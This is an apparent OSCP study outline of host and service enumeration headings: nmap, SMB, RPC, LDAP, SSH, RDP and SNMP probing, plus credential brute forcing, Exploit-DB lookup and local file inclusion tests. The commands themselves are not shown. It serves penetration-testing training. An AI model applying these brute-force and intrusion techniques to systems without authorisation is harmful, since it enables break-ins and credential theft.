Enumeration (정보 수집 및 열거)
All you need to know about basic host-based enumeration for OSCP
Network Discovery
Common Nmap Scan
-sV (Version detection)
-sT (TCP connect scan)
-sC (Performs a script scan using the default set of scripts)
-T5 (Insane mode)
-v (Increase verbosity level)
-A (OS Detection)
All TCP port scan
All UDP Port Scan (With Service and Script Scan)
100 most common ports
Nmap Script Scan
Find the nse scripts
For example, the below command will find smb scripts.
Scan using a specific NSE script
For example, below command will find any smb scripts running on port 139 & 445.
All smb scripts:
SMB share paths enumeration:
Using Metasploit portscan
Service Discovery
Port 80 & 443 - Web Discovery
Find SSL Heartbleed Vulnerablity
Scan Web Servers
Dictionary Attacks for finding hidden web objects
You can also use the common web_content list.
For cgi-bin,
Or for faster scan
Port 445 - SMB Discovery
To discover “All” of SMB
To discover the userlist
You can create a username list with awk.
Bruteforce the share names
To find Password Policy
Alternative samba enumeration using smbmap
You can download file by smbmap directly from the victim host
SMBCLIENT copying whole directory
Check the list of shares via SMB null session
Connect to a spefic share path you found
smbclient to list out share paths with sambaNTPasswrod
Port 135 - RPC Discovery
Then use the below commands for more information
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
Port 389 & 636 for SSL - LDAP Discovery
or using nmap
Port 21 - FTP Discovery
Port 3306 - MySQL
SQL Password Storage
You can check the web server configuration php file if it contains any credentials.
Port 3389 - RDP
RDP to Windows
Ruby winrm package from
Bruteforce RDP
Port 21 - FTP
Port 22 - SSH
Information Gathering using nc
The target OS is "Ubuntu", using "OpenSSH v6.6" (and package is 2ubuntu2)
Login with SSH key
ssh-gen
Bruteforce SSH Credential with hydra
Port 161 UDP - SNMP
To check if snmp port is opened
Port 88 - Kerberos
Bruteforce the username list with nmap script.
Port 1433 -SQL
Command Injection using nmap
Telnet - 25
Finding known exploits from Exploit-DB
To update to latest Exploit-DB
To find a exploit
To copy the file to your current directory.
To find item wihtout DOS attack
Local File inclusions
Simple test if the target is vulnerable to LFI
Simple test if you can run a local script against the target
Last updated